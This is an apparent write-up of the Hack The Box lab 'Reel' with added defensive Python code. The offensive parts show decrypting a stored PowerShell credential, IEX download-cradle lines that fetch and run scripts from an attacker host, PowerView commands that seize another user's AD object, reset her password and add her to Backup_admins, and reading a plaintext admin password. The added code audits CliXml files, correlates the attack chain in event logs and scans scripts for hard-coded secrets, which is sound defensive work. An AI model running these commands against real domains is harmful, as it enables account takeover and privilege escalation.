Untitled

a guest, Aug 18th, 2018
cred.xml contains a serialized PSCredential:

<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>

It sits in the same directory as user.txt. To decrypt the stored password (Import-CliXml rebuilds the PSCredential and GetNetworkCredential() exposes the plaintext):

PS C:\users\nico\desktop> $credxmlpath = "C:\Users\nico\desktop\cred.xml"
PS C:\users\nico\desktop> $credential = Import-CliXml $credxmlpath
PS C:\users\nico\desktop> $PlainPassword = $credential.GetNetworkCredential().Password
PS C:\users\nico\desktop> $PlainPassword
1ts*********

Tom | 1ts*********
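Why Import-CliXml works here: the <SS> element is a SecureString that Export-Clixml protected with DPAPI under the exporting user's profile, so only code running as that user on that host can unprotect it, which is exactly what the session above does. The audit below is an added Python example, not code from the original paste, for the defender's side of this finding: it parses a CliXml file, reports which <SS> properties carry the DPAPI blob signature and for which account, and never attempts to unprotect anything. The sample CliXml is constructed (the blob is truncated after 32 bytes) and the <Objs>/<Props> wrapper is assumed from Export-Clixml's usual output; the bare two-element fragment shown on this page is handled by a regex fallback.

```python
"""Audit a PowerShell CliXml file for serialized credential material.

Export-Clixml writes a PSCredential as <S N="UserName"> plus <SS N="Password">,
where the SS text is a hex-encoded DPAPI blob bound to the exporting user's
profile on that host. This audit only reports such blobs; it never unprotects them.
"""
import re
import xml.etree.ElementTree as ET

# A DPAPI blob starts with version 1 (4 bytes) followed by the provider GUID
# df9d8cd0-1501-11d1-8c7a-00c04fc297eb with its fields in little-endian byte order.
DPAPI_MAGIC = "01000000d08c9ddf0115d1118c7a00c04fc297eb"
CLIXML_NS = "http://schemas.microsoft.com/powershell/2004/04"

# Constructed sample in the shape Export-Clixml produces for a PSCredential;
# the blob is truncated to its first 32 bytes (assumed wrapper, not the page's file).
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{CLIXML_NS}">
  <Obj RefId="0">
    <TN RefId="0"><T>System.Management.Automation.PSCredential</T><T>System.Object</T></TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47</SS>
    </Props>
  </Obj>
</Objs>"""

# Fallback patterns for a bare fragment that is not a well-formed XML document.
_FRAG_SS = re.compile(r'<SS\s+N="([^"]+)"\s*>\s*([^<]*?)\s*</SS>')
_FRAG_USER = re.compile(r'<S\s+N="UserName"\s*>([^<]*)</S>')


def _classify(name, username, value):
    """Build one finding for an <SS> property without echoing its value."""
    is_hex = re.fullmatch(r"[0-9a-fA-F]+", value) is not None
    return {
        "property": name,
        "username": username,
        "dpapi_blob": is_hex and value.lower().startswith(DPAPI_MAGIC),
        "hex_length": len(value) if is_hex else 0,
    }


def find_protected_secrets(text):
    """Return one finding per <SS> element in a CliXml document.

    Well-formed CliXml is walked with ElementTree; a bare fragment like the one
    on the page (no <Objs> root) falls back to a regex scan of the same elements.
    """
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        m = _FRAG_USER.search(text)
        username = m.group(1) if m else None
        return [_classify(n, username, v) for n, v in _FRAG_SS.findall(text)]
    ns = {"ps": CLIXML_NS}
    findings = []
    for props in root.iter(f"{{{CLIXML_NS}}}Props"):
        user = props.find("ps:S[@N='UserName']", ns)
        username = user.text if user is not None else None
        for ss in props.findall("ps:SS", ns):
            findings.append(_classify(ss.get("N"), username, (ss.text or "").strip()))
    return findings


def summarize(findings):
    """Render findings as audit lines; secret values are never included."""
    lines = []
    for f in findings:
        kind = "DPAPI user-scope blob" if f["dpapi_blob"] else "non-DPAPI value"
        lines.append(f'{f["property"]} for {f["username"] or "<unknown user>"}: '
                     f'{kind} ({f["hex_length"]} hex chars)')
    return lines


if __name__ == "__main__":
    for line in summarize(find_protected_secrets(SAMPLE_CLIXML)):
        print(line)
```

Run it over every *.xml under a user's profile and any hit for a domain account is a credential-at-rest finding: the blob is no stronger than the NTFS ACL on the file plus the security of that user's logon session.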
We can now log in over SSH:

ssh tom@10.10.10.77
1ts*********

We need PowerView:
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1

Claire's password is reset every 60 seconds, so I built two scripts to interact with the box quickly:

IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.20/Downloads/ClairePW.ps1")

where ClairePW.ps1 takes ownership of Claire's user object, grants Tom full control over it, and resets her password:

IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.14/PowerView.ps1")
Set-DomainObjectOwner -Identity 'CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL' -OwnerIdentity 'CN=Tom Hanson,CN=Users,DC=HTB,DC=LOCAL'
Add-DomainObjectAcl -TargetIdentity 'CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL' -PrincipalIdentity 'CN=Tom Hanson,CN=Users,DC=HTB,DC=LOCAL'
$pw = ConvertTo-SecureString 'imt******' -AsPlainText -Force
Set-DomainUserPassword -Identity 'CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL' -AccountPassword $pw

Then I ssh in as claire with the password imt******:

ssh claire@10.10.10.77
imt******

Next I run:

IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.20/Downloads/ClaireGroup.ps1")

where ClaireGroup.ps1 is:

$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
Add-ADGroupMember -Identity "Backup_admins" -Members $user
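The defender's view of the whole sequence above (owner change and DACL change on Claire's object, then the password reset, then Claire adding herself to Backup_admins) is a correlation over the Windows Security log. The following is an added Python example, not code from the paste, that implements that correlation: a 5136 "directory service object was modified" event on nTSecurityDescriptor by some principal, followed within a short window by a 4724 password reset of the same user by the same principal, and separately any 4728/4732/4756 group addition where the added member is the actor or the group is on a watch list. It assumes Directory Service Changes auditing is enabled with a SACL on the user objects (otherwise the owner and DACL writes produce no 5136), that the log forwarder flattens event data into dicts keyed by the event-schema field names, and that a DN-to-sAMAccountName map is available; the events, timestamps, that map and the helpdesk control case are all constructed.

```python
"""Correlate Windows Security events into the AD-object takeover chain:
security-descriptor write on a user object (owner or DACL change, both land
in nTSecurityDescriptor) -> password reset of that user by the same principal
-> self-add to a privileged group.
Event IDs: 5136 (directory object modified), 4724 (password reset attempt),
4728/4732/4756 (member added to a global/local/universal security group).
"""
from datetime import datetime, timedelta

# Constructed sample records, as a forwarder would flatten them; field names
# follow the Security event XML data names. Timestamps are invented.
SAMPLE_EVENTS = [
    {"time": "2018-08-18T10:00:05", "EventID": 5136, "SubjectUserName": "tom",
     "ObjectDN": "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},   # Set-DomainObjectOwner
    {"time": "2018-08-18T10:00:07", "EventID": 5136, "SubjectUserName": "tom",
     "ObjectDN": "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},   # Add-DomainObjectAcl
    {"time": "2018-08-18T10:00:09", "EventID": 4724, "SubjectUserName": "tom",
     "TargetUserName": "claire"},                           # Set-DomainUserPassword
    {"time": "2018-08-18T10:00:40", "EventID": 4728, "SubjectUserName": "claire",
     "MemberName": "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL",
     "TargetUserName": "Backup_admins"},                    # Add-ADGroupMember
    # Control case: an ordinary helpdesk reset with no preceding descriptor write.
    {"time": "2018-08-18T11:30:00", "EventID": 4724, "SubjectUserName": "helpdesk",
     "TargetUserName": "bob"},
]

# Assumed lookup from distinguishedName to sAMAccountName; in production this
# is resolved against the directory, here it is constructed for the sample.
DN_TO_SAM = {
    "CN=Claire Danes,CN=Users,DC=HTB,DC=LOCAL": "claire",
    "CN=Tom Hanson,CN=Users,DC=HTB,DC=LOCAL": "tom",
}

GROUP_ADD_EVENTS = {4728, 4732, 4756}
WATCHED_GROUPS = {"backup_admins", "domain admins"}   # lower-cased for comparison


def _when(event):
    return datetime.fromisoformat(event["time"])


def detect_acl_then_reset(events, window=timedelta(minutes=10)):
    """Alert when a principal rewrites a user's nTSecurityDescriptor and then
    resets that same user's password within `window`."""
    alerts = []
    sd_writes = [e for e in events
                 if e["EventID"] == 5136
                 and e.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"]
    for reset in (e for e in events if e["EventID"] == 4724):
        for w in sd_writes:
            same_actor = w["SubjectUserName"].lower() == reset["SubjectUserName"].lower()
            same_target = DN_TO_SAM.get(w["ObjectDN"], "").lower() == reset["TargetUserName"].lower()
            if same_actor and same_target and timedelta(0) <= _when(reset) - _when(w) <= window:
                alerts.append({"rule": "acl-write-then-password-reset",
                               "actor": reset["SubjectUserName"],
                               "target": reset["TargetUserName"],
                               "descriptor_write": w["time"], "reset": reset["time"]})
                break   # one alert per reset, even if several writes preceded it
    return alerts


def detect_suspicious_group_add(events):
    """Alert on a principal adding itself to a group, and on any addition to a
    watched privileged group."""
    alerts = []
    for e in events:
        if e["EventID"] not in GROUP_ADD_EVENTS:
            continue
        member = DN_TO_SAM.get(e["MemberName"], e["MemberName"]).lower()
        actor = e["SubjectUserName"].lower()
        group = e["TargetUserName"]
        reasons = []
        if member == actor:
            reasons.append("self-add")
        if group.lower() in WATCHED_GROUPS:
            reasons.append("watched-group")
        if reasons:
            alerts.append({"rule": "suspicious-group-add", "actor": e["SubjectUserName"],
                           "member": member, "group": group, "reasons": reasons,
                           "time": e["time"]})
    return alerts


def run(events):
    """Run both rules over a batch of events and return all alerts."""
    return detect_acl_then_reset(events) + detect_suspicious_group_add(events)


if __name__ == "__main__":
    for alert in run(SAMPLE_EVENTS):
        print(alert)
```

The two-stage rule is what separates this from a plain "password reset" alert: the helpdesk reset in the sample produces nothing because no descriptor write preceded it, while a reset that follows an owner or DACL change by the same principal is the signature of ACL abuse rather than routine administration. Remediation on the directory side is to remove the WriteOwner/WriteDACL-style grants that let a low-privilege user modify another user's object in the first place.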
After that we can check the backup script:

claire@REEL C:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1
# admin password
$password="Cr4*************"

Now you can log in as Administrator:

administrator@10.10.10.77
Cr4*************
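BackupScript.ps1 is the last link in the chain: a plaintext administrator password in a script that a non-admin group can read. The scanner below is an added Python example, not from the paste, that finds this class of hard-coded credential in PowerShell text (a quoted literal assigned to a password-like variable, or a quoted literal fed to ConvertTo-SecureString -AsPlainText, the pattern ClairePW.ps1 itself uses) and reports each hit with the value masked, so the audit report does not become a second copy of the secret. The sample script, its placeholder values and the rule names are constructed.

```python
"""Scan PowerShell script text for hard-coded credentials and report them with
the secret masked, so the finding itself does not re-leak the value."""
import re
from pathlib import Path

# Each pattern exposes a named group 'secret'. Case-insensitive because
# PowerShell cmdlets and variables are.
RULES = [
    ("plaintext-assignment",
     re.compile(r'\$(?P<name>\w*(?:pass|pwd|secret|token)\w*)\s*=\s*'
                r'(?P<q>["\'])(?P<secret>[^"\'\r\n]+)(?P=q)', re.I)),
    ("securestring-from-literal",
     re.compile(r'ConvertTo-SecureString\s+(?P<q>["\'])(?P<secret>[^"\'\r\n]+)(?P=q)'
                r'[^\r\n]*-AsPlainText', re.I)),
]

# Constructed sample; the values are placeholders, not the page's passwords.
SAMPLE_SCRIPT = """# admin password
$password="Cr4ckM3-constructed"
$user = "Administrator"
$secure = ConvertTo-SecureString 'imt-constructed' -AsPlainText -Force
$safe = Read-Host -AsSecureString "Enter password"
"""


def mask(secret, keep=3):
    """Keep a short prefix for triage and star out the rest, as the page does."""
    return secret[:keep] + "*" * max(len(secret) - keep, 0)


def scan_script(text, path="<inline>"):
    """Return one finding per rule hit: path, line number, rule, masked value."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for rule, pattern in RULES:
            for m in pattern.finditer(line):
                findings.append({"path": path, "line": lineno, "rule": rule,
                                 "masked": mask(m.group("secret"))})
    return findings


def scan_tree(root, suffixes=(".ps1", ".psm1", ".psd1")):
    """Walk a directory and scan every PowerShell file in it."""
    findings = []
    for p in Path(root).rglob("*"):
        if p.suffix.lower() in suffixes and p.is_file():
            findings.extend(scan_script(p.read_text(errors="replace"), str(p)))
    return findings


if __name__ == "__main__":
    for f in scan_script(SAMPLE_SCRIPT, "BackupScript.ps1"):
        print(f'{f["path"]}:{f["line"]} [{f["rule"]}] {f["masked"]}')
```

The Read-Host line in the sample is deliberately not flagged: prompting for a SecureString at run time, or pulling the credential from a managed secret store, is the fix for the two patterns that are.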